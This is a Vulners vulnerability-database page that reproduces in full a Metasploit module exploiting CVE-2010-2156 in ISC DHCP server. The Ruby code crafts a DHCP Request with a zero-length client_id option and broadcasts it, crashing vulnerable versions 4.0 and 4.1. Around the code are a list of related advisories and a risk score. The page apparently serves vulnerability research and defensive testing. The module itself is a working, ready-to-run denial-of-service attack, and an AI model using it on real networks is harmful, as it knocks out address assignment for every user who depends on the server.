Vulners
Lucene search
ISC DHCP Zero Length ClientID Denial of Service Module
🗓️ 11 Apr 2011 15:56:39Reported by sid, theLightCosine <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 26 Views
| Reporter | Title | Published | Views | Family All 45 |
|---|---|---|---|---|
 | ISC-DHCPD Denial of Service | 3 Jul 201000:00 | – | zdt |
 | The vulnerability of the ISC DHCP server, related to insufficient validation of input data, allows a attacker to trigger a service failure. | 14 Jun 201800:00 | – | bdu_fstec |
 | CVE-2010-2156 | 29 May 201815:50 | – | circl |
 | ISC DHCP Server Denial of Service And Buffer Overflow (CVE-2004-0460; CVE-2006-3122; CVE-2010-2156) | 1 Aug 201000:00 | – | checkpoint_advisories |
 | CVE-2010-2156 | 7 Jun 201013:38 | – | cve |
 | CVE-2010-2156 | 7 Jun 201013:38 | – | cvelist |
 | CVE-2010-2156 | 7 Jun 201013:38 | – | debiancve |
 | ISC DHCPD - Denial of Service | 3 Jul 201000:00 | – | exploitdb |
 | ISC DHCPD - Denial of Service | 3 Jul 201000:00 | – | exploitpack |
 | [SECURITY] Fedora 12 Update: dhcp-4.1.1-17.P1.fc12 | 24 Jun 201016:27 | – | fedora |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Dos
include Msf::Exploit::Capture
def initialize
super(
'Name' => 'ISC DHCP Zero Length ClientID Denial of Service Module',
'Description' => %q{
This module performs a Denial of Service Attack against the ISC DHCP server,
versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request
message with a 0-length client_id option for an IP address on the appropriate range
for the dhcp server. When ISC DHCP Server tries to hash this value it exits
abnormally.
},
'Author' =>
[
'sid', # Original POC
'theLightCosine' # msf module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2010-2156' ],
[ 'OSVDB', '65246'],
[ 'EDB', '14185']
]
)
register_options(
[
OptAddress.new('RIP', [true, 'A valid IP to request from the server'])
]
)
deregister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')
end
def run
open_pcap
print_status("Creating DHCP Request with 0-length ClientID")
p = PacketFu::UDPPacket.new
p.ip_daddr = "255.255.255.255"
p.udp_sport = 68
p.udp_dport = 67
# TODO: Get a DHCP parser into PacketFu
chaddr = "\xaa\xaa\xaa\xaa\xaa\xaa"
dhcp_payload = "\x63\x82\x53\x63\x35\x01\x03\x3d\x00\xff"
p.payload = dhcp_req(chaddr,dhcp_payload)
p.recalc
print_status("Sending malformed DHCP request...")
capture_sendto(p, '255.255.255.255')
close_pcap
end
def dhcp_req(chaddr,payload)
req = "\x00" * 236
req[0,3] = "\x01\x01\x06" # Boot request on Eth with hw len of 6
req[12,4] = Rex::Socket.addr_aton(datastore['RIP'])
req[28,6] = chaddr
req + payload
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Mar 2019 19:04Current
7High risk
Vulners AI Score7
CVSS 25
EPSS0.76412